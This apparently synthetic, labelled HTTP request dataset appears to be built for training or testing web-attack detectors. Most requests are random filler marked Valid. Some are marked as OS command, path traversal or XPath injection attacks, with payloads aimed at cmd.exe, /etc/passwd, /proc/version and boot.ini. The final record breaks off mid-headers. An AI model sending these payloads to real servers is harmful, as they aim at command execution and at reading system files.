Start - Id: 36442
class: OsCommanding
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: 14.221.72.220
Connection: nidecsie
Accept: video/quicktime, image/gif, text/*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, deflate;q=0.2
Accept-Language: f-i8eHhbsd, areo-Tacct, dtso-fn, hvhrse-2uaop;q=0.8
Cache-Control: no-transform
Client-ip: 107.177.36.98
Cookie: soiketttnao=oyjBouoXv;rtitmipD=yh0gjZhCdnO;uvPbfmochau=de2h;ruE2b6ll=Dl6KMs htwictno;Psn4Oe=448;rtletq0tu=tniWc
Cookie2: $Version="10"
Date: Mon, 10 May 04 18:26:38 UTC
ETag: W/"u4HtIBSrU_SJ2Q3p6Q"
Expect: ajatsei7=hn7Hs
From: ghijiO@Fsrajafric.com
If-Modified-Since: Tue, 03 Jan 06 20:32:04 CET
If-Unmodified-Since: Sat, 28 May 05 14:28:11 CET
If-Match: "mi@C7yLIBzB2NlqZp"
If-None-Match: "Wih6zCLb5RAQVlldUOW"
If-Range: "J1sRG1ni.K6tcorw"
Max-Forwards: 4
MIME-Version: 0.7
Pragma: c2fqred=Ddnj
Authorization: esyEx nttyicer=syse
Range: 18-43314
Referer: /emthen4/sohAme0/gmhaasmc/xhA1xew/yn0s.php4
TE: deflate,trailers,chunked;q=0.8
Trailer: Trailer
User-Agent: Mozilla/0.5 (X11; U; SunOS sun4u 4.1; je-eE; rv:5.8.5) Gecko/48488030
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-Color: color32
UA-Pixels: 006x6469
Via: 9.7 www.wtmnbFs.htm, Iot8a/9.0 www.emhoxf.jpeg, FTP/7.8 4.87.94.39:7108
Transfer-Encoding: gzip
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 92.128.39.126

null

End - Id: 36442
Start - Id: 5004
class: Valid
PUT /jksCvawRCxYHzn/uYhQ3ERME8bHaZ/0yscriptYemZYKb1SEw.dll? HTTP/1.0
Content-Length: 22
Content-Language: ea,9Xvqxd
Content-Encoding: identity
Content-Location: http://nJua.fr/Hrez/3toahce/yaai/ton8hs9f/vlSi5tt.asp
Content-MD5: ZmV5MDd5ZG8yZXNmaWl0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 27 Feb 04 07:05:58 CET
Last-Modified: Sun, 18 Sep 05 08:59:56 GMT
Host: 85.4.32.10
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: tda6t-eAy1mn9, r-utt7cpyn;q=0.4, rrp57esd-lbhnraa;q=0.3
Cache-Control: max-stale=41695
Client-ip: 111.197.53.14
Cookie: zt4=oaho8a8hoiit;O_ncmochaoRXEn7= dmd=i\r2;x9kulJ_k9=yL_03q.3;i8hcPtseAoYl=rysdNservicesxnm2;ifithovt3tre=3r e
Cookie2: $Version="80"
Date: Thu, 08 Sep 05 17:42:45 UTC
ETag: "IHXPz-1lLhpfjPWyc"
Expect: 100-continue
From: goaachbt@talrshye.be
If-Modified-Since: Mon, 01 Aug 05 07:16:30 UTC
If-Unmodified-Since: Sun, 16 Aug 09 09:06:49 GMT
If-Match: *
If-None-Match: "ly13crp5qACCqwUCV4jD"
If-Range: Fri, 15 Sep 06 22:11:13 UTC
Max-Forwards: 3
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic a2xtaTpxVGlz
Range: -10
Referer: /prer.txt
TE: gzip;q=0.1,trailers,deflate
Trailer: Accept-Language
User-Agent: Mozilla/8.3 (Machintosh; U; PPC Mac OS X 4.7; Mn-nw; rv:0.4.0) Gecko/62399909
UA-CPU: 68000
UA-Disp: 770,4092,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5947x3710
Via: 3.9 www.dSsi.jpeg:807, 0.4 57.250.88.49, tIu5/7.6 www.mdra.jpg:52
Transfer-Encoding: compress
Upgrade: hMr/2.1, sbroy7/3.5, sa4aS8/1.4, Tm12uo/1.4, R6cee/4.7
Warning: 459 www.stfkt.css:00 "enygOrouo8ussoypt" 
X-Forwarded-For: 3.243.104.229
X-Serial-Number: 03530
----: --------------------------------------
~~~~~: ~~~~~~~~~~~

rlBejaoH8uzae=r&rz=538

End - Id: 5004
Start - Id: 31360
class: Valid
GET /eNib/YnshutdownVD9cb1Py8/metauTz/p02wDriztnc./nW@l.6Bjb.shtml?ersfdNlsrrmitow=ncu6aura&Dosm3ruL=5369259&lmiurJisd7er=388648 HTTP/1.1
Host: www.om8I9i.org
Connection: close
Accept: video/*, image/*;q=0.8
Accept-Charset: x-mac-roman;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 34.199.208.241
Cookie: eARag5rsgmn=lrrebiOvdehrilu4an;onde3Ne=79551764;6thasytn=evallog0;zilnrTrr=Re;nxk5en29est=fealdtecoatPprhu;hsyeun1=947771793
Cookie2: $Version="38"
Date: Wed, 13 Aug 08 06:17:10 CET
ETag: W/"QD7G_upMUzYLHZ4"
Expect: 100-continue
From: iaamdisn@peasep.org
If-Modified-Since: Thu, 10 Jan 08 15:35:53 GMT
If-Unmodified-Since: Sun, 05 Aug 07 09:54:06 CET
If-Match: "TtEEyIfT3Z8urLks"
If-None-Match: *
If-Range: *
Max-Forwards: 84
MIME-Version: 5.1
Pragma: onFuh=zdnno6oa
Proxy-Authorization: Basic ZTVzaGlvOmVhOXdlYTA=
Authorization: Digest username="eoLnst9"
Range: 8-,2512-,696-3957
Referer: /og3a/inn4qsUt/ooookes.exe
TE: chunked,gzip,chunked;q=0.0
Trailer: TE
User-Agent: 4n5ns/6.4.9.6
UA-CPU: x86
UA-Disp: 2596,238,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 562x0900
Via: uem59/8.9 78.206.52.32, FTP/0.2 www.emOnsmel.htm, 9.3 93.219.131.199:98
Transfer-Encoding: D3eprL; SWturi=ayur
Upgrade: tnrpho/3.2, oePO/9.4, pnEdrr/9.5, kusAni/0.3, dhhopl/0.1
Warning: 013 www.desun.jpg "AikotD" "Sun, 12 Nov 06 05:18:44 UTC"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 56784
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31360
Start - Id: 24346
class: Valid
GET /xQk4VwvGA.ww/TE/azZe/acC/tCmM6ZOTMuWa4NTDX.png?urSie3egsjH1=0&isaqanctc7rc9t=qyE&o1to=qY.&t8dedxedoeucD=tn&wgetkQyandj3w3dshutdown=RuEea&hl28ehi=pec&OuSdo5eq=ieude&XHbvM_D=928554382 HTTP/1.0
Host: 84.42.186.234
Connection: ised
Accept: */*
Accept-Charset: iso-8859-9, big5;q=0.0, shift_jis, iso-8859-8-i
Accept-Encoding: gzip, deflate;q=0.7, gzip
Accept-Language: *;q=0.9
Cache-Control: min-fresh=134
Client-ip: 114.108.65.238
Cookie: sy0aVeeN7Kbin=(2]
Cookie2: $Version="7"
Date: Sun, 28 Mar 04 21:59:18 GMT
ETag: W/"uI7PZAM@ronIxsGK"
Expect: 100-continue
From: 5hRu@STpwssetis.be
If-Modified-Since: Tue, 16 May 06 12:59:12 GMT
If-Unmodified-Since: Sun, 06 May 07 20:18:16 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 493
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: NTLM c29ib2V0ZXB6dGpzc2k2bm1vcnJoYWV0SXQwZ3RvczZ0bg==
Authorization: NTLM ZXNJZ3JOdGNhaG53Y29jSThkdGR0ZTBsbHJpdGV1MHJ1ZXNzbmhyZ2ZudFJpcGU=
Range: 3174-4551,6064-
Referer: http://www.mhFii.net/gaohs/l5erg5/sosl/toraor.asmx
TE: deflate,gzip;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/5.7 (compatible; MSIE 7.7; Win 9x; vepl)
UA-CPU: 68000
UA-Disp: 544,888,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 352x5203
Via: FTP/5.9 www.iqtH.jpg:14044, HTTP/8.7 242.145.213.156, 5.1 196.59.58.218:95
Transfer-Encoding: ugeEoc
Upgrade: Hiu/7.2, tsosIp/1.1, 2cq/2.4, jea8Dd/0.5
Warning: 748 www.Nint.js:86733 "me6otyateqi77lTde" "Tue, 01 Mar 05 01:32:17 CET"
X-Forwarded-For: 73.2.112.190
X-Serial-Number: 6737813475044771
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24346
Start - Id: 24922
class: Valid
GET /abuhGP/B13A/npdmEaverohtsEgdnn/ctvyrttzudeeebeIatrq.tiff? HTTP/1.1
Host: 18.85.127.8:80
Connection: o4losr
Accept: */*
Accept-Charset: x-mac-korean
Accept-Encoding: compress;q=0.5
Accept-Language: smds8h-ny0amat;q=0.8, jxiaay-a4rtl;q=0.0, ioer-9cemeRe;q=0.9, pC1e-oaiI9ye;q=0.1
Cache-Control: only-if-cached
Client-ip: 210.63.57.145
Cookie: bdei=is0iect;ohho=1t:0|bninRei i;8npeo0sndaeov=tzizeyuavsexece;tnFewp=bA;efraSywp=ak8og;vaDmjy0F@s=4037942
Cookie2: $Version="0"
Date: Sun, 07 Nov 04 13:17:03 UTC
ETag: W/"94Jp1voaoqMA_sTF"
Expect: 100-continue
From: pwmfp9h@tptOa1oce.de
If-Modified-Since: Fri, 21 Jan 05 21:45:48 CET
If-Unmodified-Since: Thu, 11 Jan 07 15:22:48 UTC
If-Match: "STqzOOFZL.ApypPlj"
If-None-Match: *
If-Range: Thu, 23 Dec 04 14:41:06 CET
Max-Forwards: 2
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="nodeiar"
Authorization: Basic YXNjZTpJM0lvbw==
Range: -47448,86125-296,-084
Referer: http://dnssrun8.biz/awr61.asmx
TE: trailers
Trailer: If-Range
User-Agent: HTooaIi/8.0
UA-CPU: MIPS
UA-Disp: 899,4850,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8559x9210
Via: 0.4 146.123.34.221, 7.6 52.61.71.68
Transfer-Encoding: cjcuh
Upgrade: eioe/8.0, tttl/1.6, aeanad/4.0
Warning: 458 85.135.15.199 "githTe" "Sat, 19 Apr 08 21:56:38 CET"
X-Forwarded-For: 45.246.59.205
X-Serial-Number: 2466804840974150
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24922
Start - Id: 1892
class: Valid
GET /b@NperldocumentsBuGHQ3Jall/RexecMJLYKVBv3jz7/nt/4r8sCwindow.open4whereYnJ8uQ/eisiEdE/RGF.gif?s4ysalxos6Fens=il8b&5ihtahhhoawsw3k=mFUbSOV6 HTTP/1.0
Host: www.o7aea.st
Connection: zasHpu8n
Accept: */*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: ibaoer-usep5euc;q=0.8, SlgH-2m;q=0.6, M4E48s-aeeasaei;q=0.6, Faamme8i-ahee, ny-oSlhrse;q=0.4
Cache-Control: y='es'
Client-ip: 136.226.137.157
Cookie: et=ac
Cookie2: $Version="57"
Date: Wed, 13 Sep 06 03:45:34 GMT
ETag: "w0VM5BWpK4A5p.gOkTD"
Expect: oroaNt=namtWhbs
From: hfTlg@eeXge7.fr
If-Modified-Since: Sat, 03 Sep 05 16:34:17 CET
If-Unmodified-Since: Thu, 13 May 04 24:28:34 GMT
If-Match: *
If-None-Match: "i60SjvObjIWfHAm"
If-Range: "REZLPC_5LwXfbJ8_rq"
Max-Forwards: 966
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: wrea ltni=8Rsiyra
Authorization: Basic dHBvODpHdkRkcklvRA==
Range: -943,-739,0-64
Referer: /2TZetl/elo0o/Jebnkoy/bregghu.css
TE: chunked,trailers
Trailer: Expect
User-Agent: Mozilla/0.0 (Windows; U; WinNT 9.1; ie-wo; rv:2.7.2) Gecko/87900306
UA-CPU: MIPS
UA-Disp: 272,378,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 722x920
Via: FTP/2.6 www.ed7otnmo.css, 5.1 50.132.54.74
Transfer-Encoding: deflate
Upgrade: tomf/2.5, DFma/1.5
Warning: 924 www.bbtn.js "trtrnasnAn" 
X-Forwarded-For: 96.142.115.10
X-Serial-Number: 54871844
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1892
Start - Id: 36292
class: PathTransversal
GET /oedwennoaxos2telf/KqBcbY7QIO/gzBuVIXk5GokcVH/wu-Yjy-mQCuya-EbGB.e/u-/r5tlykakpS/1s.oHY3YoZ7.htm?eDhwr=92&HwJY.H-AUy9s=nj24i&hgsdh3otih=07201&pt2dieaiztc2nw=oAs&div9IReUY=tmnatea&El=n903i&alennnieeni2br=126&nqMUraMlno5jra6=3524238428&_andOfn2Ej.f=cHJPAi5qU&orUnwCbgsoundYCIK=%2Fetc%2Fpasswd&2Ypetiluiyrnaab=wp-%29a&rstle=taccess_logqE HTTP/1.1
Host: 129.17.246.63:80
Connection: apIc
Accept: audio/*;q=0.7, audio/*, text/*;q=0.5
Accept-Charset: isiri-3342;q=0.7, iso-8859-7;q=0.5, windows-1252, koi8-r
Accept-Encoding: compress, compress;q=0.5, identity;q=0.1
Accept-Language: inp43tr-ska6soT;q=0.3, m-nsnchs;q=0.1, aapiabeE-aer;q=0.5, nmN-xtSomyh
Cache-Control: t4mMch=ddu
Client-ip: 114.100.144.6
Cookie: 8iitiR1=t=%sek]zIcbgsoundtU>a sock_streamr
Cookie2: $Version="483"
Date: Thu, 08 Jul 04 23:52:29 CET
ETag: "9as6V4Gtf64Xu1_Hj"
Expect: 100-continue
From: Ai3uSa@urpega.be
If-Modified-Since: Sat, 01 Mar 08 14:34:55 CET
If-Unmodified-Since: Mon, 05 Jul 04 19:09:17 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 26 Feb 08 24:39:26 GMT
Max-Forwards: 9
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: NTLM aXVmc2llbjJSZ2VvSGVlc2wwdW90N2FvYWV6ZXRyYWg=
Authorization: NTLM cmE0b1luZW1udHJiaWNkNW50ZWpvaW42dGVhbTJpYWhu
Range: 48895-751657,65-
Referer: /eItsDV/uEsdajyr/Rpen/lyhoc/EleisLz.pl
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/4.4 (Windows; U; Windows NT 4.0; Yt-ae; rv:4.6.2) Gecko/06074243
UA-CPU: StrongARM
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: FTP/1.2 87.75.64.130
Transfer-Encoding: gzip
Upgrade: ye1nNS/5.5
Warning: 517 www.aoior0c.tiff:33767 "TpadeIe" 
X-Serial-Number: 50534394193049437616
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36292
Start - Id: 48555
class: XPathInjection
PUT /j04ES/sNz.JT09/wAeS/tvEy-nirVUzmNTr-Fy/pmjmtelnetfx4vvarWvT/aEXW8@7HjG/aqWf62/nKp4Q9V_N/vevt9n/tjelrrmRtriuoxet/r.hUK05u.gif? HTTP/1.0
Content-Length: 161
Content-Language: bb
Content-Encoding: identity
Content-Location: http://mherf.biz/s7rmhe.pl
Content-MD5: b3R5ZWRpdWVraWhTZWVpcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 Sep 09 01:33:25 GMT
Last-Modified: Sat, 05 Aug 06 17:40:46 UTC
Host: 61.146.138.216
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.1, compress;q=0.5
Accept-Language: *;q=0.7
Cache-Control: min-fresh=87
Client-ip: 248.76.165.99
Cookie: OntOpeu=8708;uneBdhly=58167504;ioomrzrs8=977421;qvOuuj4Eag1lne=0t sOtaoopene&t;
Cookie2: $Version="8"
Date: Fri, 23 Jan 09 08:26:30 GMT
ETag: W/".NpEoPMJ922d-Z-plN"
Expect: 100-continue
From: 5lotN@aerqwne.st
If-Modified-Since: Fri, 28 Sep 07 01:25:39 CET
If-Unmodified-Since: Fri, 27 Feb 04 02:00:01 CET
If-Match: "j7K8d-c1C3Z8cCBCAw"
If-None-Match: "Qa7LaSaBTatjg2uP6Ru-"
If-Range: Thu, 25 Jun 09 23:36:36 GMT
Max-Forwards: 5
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM aWlsc3Bvc2V1dG9laHRjZXJXb3V0b2VpaWFlZWVyYWF0dGZ0YWlJbGE=
Authorization: NTLM cm1zbFN2OW5hdHlkYmhmb0xrZ1lpRTRhb3F0c3B5ZFNob2UybQ==
Range: 937233-073734,-13,-768
Referer: /txsohb/ohhviqes.msf
TE: trailers,deflate;q=0.7
Trailer: Via
User-Agent: 0uyxSip2e2cfxiu
UA-CPU: StrongARM
UA-Disp: 2908,9185,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 429x1759
Via: HTTP/5.0 204.218.167.176, 6.3 www.ig96red.tiff, 3.8 www.lesWj.js
Transfer-Encoding: deflate
Upgrade: lexe/0.2, mX4rfi/5.5, ue5de/1.9
Warning: 221 www.Tjeo.jpg "mhTIthjmdIiio6h9eh" 
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 63432598525498098
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

naFai1h20aoea=w1Q.G7ui&UGuKJZ@=aeaogSa']   |     P |    //user[    name/text( ) =  'cqoz&1mrn=itd&uctLrisi7lM=anE'dheuRtoyxQeat&tvl=760

End - Id: 48555
Start - Id: 20818
class: Valid
GET /241ngeem/bqgXjB6/tEO-ram/f1D3NHG1A.RZT/ssNEhtljaroit/YEj-aA28passwd/FDwLS/eluPsse8oy6rede/oQOqYT7y/pchbfstuttxtiOl/eerip/whereqlwi.php? HTTP/1.0
Host: www.t2atrE.biz
Connection: keep-alive
Accept: image/png;q=0.7, application/*;q=0.5, application/*;q=0.4
Accept-Charset: iso-8859-2;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: i='nnakns0'
Client-ip: 69.221.101.250
Cookie: capee=;w
Cookie2: $Version="5"
Date: Fri, 24 Sep 04 01:30:40 CET
ETag: "AT5D_IiX_U36NdO-Va"
Expect: tvs7otwN=ucuxia;ehaudht=eitn
From: itbAy3@24cao.it
If-Modified-Since: Fri, 12 Mar 04 04:05:43 CET
If-Unmodified-Since: Wed, 28 Apr 10 17:49:01 UTC
If-Match: "ejlgHsmUzCj1ZrG"
If-None-Match: "uB505UxwHa43.IO"
If-Range: *
Max-Forwards: 4444
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: neczgh sdasses=faohlid7
Authorization: NTLM YWcxYTFzN2FlZXNyaXRycXdkamVpdGV0Y09tZHppb2xyc3VyZXJybg==
Range: 05030-356,-016,3009-
Referer: http://www.2tztB.org/leaaki3y/rqshl/lofceqeo/diciesg/ageircmE.tar
TE: trailers
Trailer: Accept-Encoding
User-Agent: r88V-t http://www.sKSwhl.gov
UA-CPU: PowerPC
UA-Disp: 5311,821,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3856x4150
Via: FTP/8.7 252.113.229.213, 5.8 202.212.43.45:777
Transfer-Encoding: identity
Upgrade: 0hs2/4.7, 6tshK/5.2, fttq/6.5
Warning: 749 252.247.222.64 "s3trs3eja" "Mon, 13 Aug 07 02:23:10 CET"
X-Forwarded-For: 196.176.140.95
X-Serial-Number: 390733
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20818
Start - Id: 46461
class: PathTransversal
POST /ieisezNEara/mUkcGo8cf.LovA/bUT4gT4acceptZK/alFSk.php? HTTP/1.1
Content-Length: 30
Content-Language: hhbyhu,aerOrn
Content-Encoding: identity
Content-Location: /smeymmu4/idpedv/n2ec.gif
Content-MD5: dGhhVWVidXRkcmZJaXk3aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 25 Nov 05 09:10:39 CET
Last-Modified: Thu, 26 Nov 09 23:32:42 UTC
Host: 127.170.17.50
Connection: iMernn
Accept: text/html
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cookie: ndteeneleoRi0=63353;nsvLhtasn=6737;C_NSFsHLVibY=hheignb& x;syeVh=../../../../../../proc/version;eeir=8969;p5nr=ed/|
Date: Sun, 12 Jul 09 19:07:29 GMT
ETag: "76cTmdlTy0o0_S6F"
If-Modified-Since: Sat, 24 Nov 07 16:41:59 CET
If-Range: "iG47@ayR9sXLD2yE6"
Max-Forwards: 304
Pragma: rMa7='ewehP'
Proxy-Authorization: 56Nkql uoMh=Kna67s
Authorization: Digest nonce
Referer: /htRrnl.cfm
Trailer: Expect
User-Agent: Mozilla/5.9 (compatible; MSIE 9.1; Linux i386; faemte2Tc)
UA-CPU: StrongARM
Transfer-Encoding: EriSj; ltlul=fnNHfe
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

end=fha&asateosiiYnra=75499849

End - Id: 46461
Start - Id: 7572
class: Valid
POST /eezod4yszotaiEu3lu/eibs/uYTHqBjj0xH.EpTz/nnNnexcNd8rn.php4? HTTP/1.1
Content-Length: 247
Content-Language: i2,geNheo
Content-Encoding: identity
Content-Location: http://www.wiaoImg.ch/rieSer/rxhhtmrb/ipfs/33lr/nopcazra.mpg
Content-MD5: YnRHUmJuc2N0Mjg5aXRzMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 01 Mar 08 17:42:24 CET
Last-Modified: Fri, 24 Mar 06 14:12:40 GMT
Host: www.nnbwhh8e.fr:80
Connection: haaer
Accept: video/mpeg;q=0.7
Accept-Charset: iso-8859-4
Accept-Encoding: 
Accept-Language: r-Esbcb, zHtwsee-iTcuR;q=0.1
Cache-Control: mh9='hoxaero'
Client-ip: 167.4.203.175
Cookie: Enph-uftpoM=dl>ytusSrogps(txme=4;aoo4dneaK=te9sIhos45f5syo;ueoe=1eoah;eidp8=+q:|0tabpur:ri;elhe=)Ahp servicesdh ;2liI=nf4
Cookie2: $Version="277"
Date: Fri, 17 Sep 04 17:11:03 GMT
ETag: "lNwGXgAu@mRnVRxV"
Expect: 100-continue
From: pu3inrn@eUo4a.uk
If-Modified-Since: Wed, 09 Jun 04 03:40:14 UTC
If-Unmodified-Since: Mon, 13 Nov 06 07:25:45 CET
If-Match: "6hk_OfJQ.9s-Z2B1"
If-None-Match: *
If-Range: Sun, 25 Jan 09 15:35:00 GMT
Max-Forwards: 1
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic ZGl0NWRuZTpkaXNhZnRzaQ==
Authorization: Digest algorithm=ae5eh
Range: -9533
Referer: /on6n/m9hNlnte.asmx
TE: deflate;q=0.9
Trailer: Accept-Language
User-Agent: a670zaeErhe3yceaatc
UA-CPU: Sparc
UA-Disp: 743,207,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5452x8667
Via: HTTP/1.4 www.Piigks.shtml, 1.1 150.54.200.247, Uihsn/6.6 250.35.196.154
Transfer-Encoding: gzip
Upgrade: rhr/0.3, aiyi/7.5
Warning: 670 www.ienda.png "9anpoipyn2sa" 
X-Forwarded-For: 133.114.114.3
X-Serial-Number: 6700173
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2yosaBl=etwn&hniefnStetulzh=enf9ndmeTkltt0au6&lzrojsesOn=ieda;n8deee&llcetshddrlYi=7bgsound&7kae7lnEmad4=4198103219&t9appaas=1&f3N1enhs=as i):te]d&|pcS9&laaeteady=326827&fb7=tvn&tf=21935&Irer4fthigte1ae= &1d7tmp8G=ta8j&fteeeAtaIta=xxEh

End - Id: 7572
Start - Id: 15362
class: Valid
GET /wSdvmvZ103X/a4/9CWML4hFYdoOei.php3?rkUldo=ikeedexecmNensock_stream%29xowecat&CTTjyhfZ6.andboot.ini=ypt&2r5e9w3ahye2=tno&densomwe8enw=6idSorscripte%3Cno%27ed4&qiqirt2enss=nnt HTTP/1.0
Host: 44.242.24.173
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: 8net=r44onoe
Client-ip: 1.126.250.57
Cookie: JevvMp.3-YTL=3=id)i3binhh%httpw13ua;qz4stg=elz2 etu;m2eG8dNpxx9=mKD9B;7andUJ5KSKfj=~telneto[%=pwindow.open;ini2tned=eeh
Cookie2: $Version="740"
Date: Sat, 06 Dec 08 17:18:36 CET
ETag: W/"rpsSZWkJNUkV0RD9"
Expect: 100-continue
From: hemanaoa@nrqynnnt.uk
If-Modified-Since: Mon, 29 Oct 07 14:26:09 GMT
If-Unmodified-Since: Sun, 23 Dec 07 07:35:29 CET
If-Match: *
If-None-Match: ".8OJTPD4dZU5BUYUcln"
If-Range: *
Max-Forwards: 490
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM OGlndWVmdW5aZGZpbzRnZG5wbGlxYnJjYW5hbGFlc25pNXRy
Authorization: Basic SG1mbnlBOmNiVGV0YXI=
Range: 75-,670-452322
Referer: http://ateoy.it/rn0m.tar.gz
TE: trailers
Trailer: TE
User-Agent: oeaevnijuad22g
UA-CPU: StrongARM
UA-Disp: 4712,7583,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 065x683
Via: 9.4 www.higeIs.jpg, h6et/6.4 www.boerepp.gif, 3.3 www.muhs.png:25
Transfer-Encoding: compress
Upgrade: taal/5.1, qooc/0.7
Warning: 463 38.25.235.94 "nanvauebu" 
X-Forwarded-For: 76.40.16.131
X-Serial-Number: 7835814731
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 15362
Start - Id: 1556
class: Valid
GET /wd/5mlrlasbrsp.jpg?l1fZlcatV=ia&ghnmatcre8ozti=9&oqkhr6ul=enurwindow.open&cln=9&tae0chni=5&aaTno2kj0erER=hETt-ydh&qsrSos=7&antdoeceplvugnO=lo7r1poarr&openW7t=%28%3B5or+gI%276r%24O&hoereoulg1=hs&deb1huhhenN=7nR0G%40T&323iU0k7H61=i9lE75HiHR.X&noha0tcsumNahsr=+ti HTTP/1.0
Host: www.HXisti5.de
Connection: close
Accept: image/png, audio/x-wav;q=0.5
Accept-Charset: utf-8;q=0.2, hz-gb-2312;q=0.0, iso-8859-9;q=0.3, windows-1258;q=0.8, windows-1253
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-age=137
Client-ip: 139.146.235.78
Cookie: tyseb=1336
Cookie2: $Version="4"
Date: Fri, 27 Apr 07 01:26:48 GMT
ETag: "vFdKUf@MPEr6N6U"
Expect: meYira=tis4mexm;eieUm
From: 3utdaot@tekio.net
If-Modified-Since: Tue, 13 Dec 05 16:43:46 GMT
If-Unmodified-Since: Tue, 11 Oct 05 04:11:33 CET
If-Match: "QpTVAgsDG7jfmSvI6UT"
If-None-Match: *
If-Range: *
Max-Forwards: 913
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic OGRhc3J0Y3Q6UmVlVHk=
Authorization: yoT7 bseO=fana
Range: -6,-03,-014
Referer: http://yeSjh.gov/wUgnme/sseaiE/cttedrgn/eabi9t9/ncoeHBi.asmx
TE: trailers
Trailer: Host
User-Agent: oubVb7QOK http://www.rgzos.de
UA-CPU: StrongARM
UA-Disp: 048,2159,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7934x8697
Via: wn9A/3.6 118.52.173.140, ad0/9.9 www.zaee.htm:3797
Transfer-Encoding: compress
Upgrade: ameA/9.9, rzoIer/1.8, llO2/3.9, Oyt/1.5
Warning: 856 30.67.224.109:7 "ngikdsay3mi" "Sat, 09 Jun 07 23:13:19 GMT"
X-Forwarded-For: 36.197.187.144
X-Serial-Number: 2858071636366715430
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1556
Start - Id: 28342
class: Valid
GET /twQIgO3BvbMbow0F6@ZS/oce9zuecs/oE/rtdtezkqn1a5pEnSs.php3?eboplecoBgHe=25&Zp=%28ilNunione4e&fuFraHeamEms=n1g_FZRff&BnHhtiR=ip3ATHnJ&6avaohrDW=13436&rabmaEncqnifi=tmpiz%3D%28 HTTP/1.1
Host: 150.137.77.101
Connection: close
Accept: application/postscript;q=0.7
Accept-Charset: euc-jp;q=0.6, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: 6oaeefxn-ge7qkemn;q=0.5, oenoee-vifguia;q=0.6, vG0ulpY-enip;q=0.1
Cache-Control: mz9tyW='kYar2'
Client-ip: 63.248.198.189
Cookie: loe=5%EiNyoE=2;dSt=EEeaccept
Cookie2: $Version="477"
Date: Thu, 12 Feb 04 09:33:49 UTC
ETag: W/"mfRHSAnTHE94RQ5"
Expect: 100-continue
From: uo4ee7@tp9n.net
If-Modified-Since: Sun, 23 May 04 02:17:35 UTC
If-Unmodified-Since: Sun, 27 Mar 05 18:46:17 GMT
If-Match: "ae7GRja41vl9-ZJa7a"
If-None-Match: "byDF59xYzmo8BUtB"
If-Range: Wed, 11 May 05 21:04:00 CET
Max-Forwards: 0102
MIME-Version: 9.3
Pragma: inosv=r
Proxy-Authorization: Digest cnonce="pniifin"
Authorization: trasAd o9rIesat=ihhio
Range: 2735-73,95-
Referer: http://pee4.net/l6tozp/brbcph/lJdbe/xonolyi/2cnim.pdf
TE: trailers,trailers
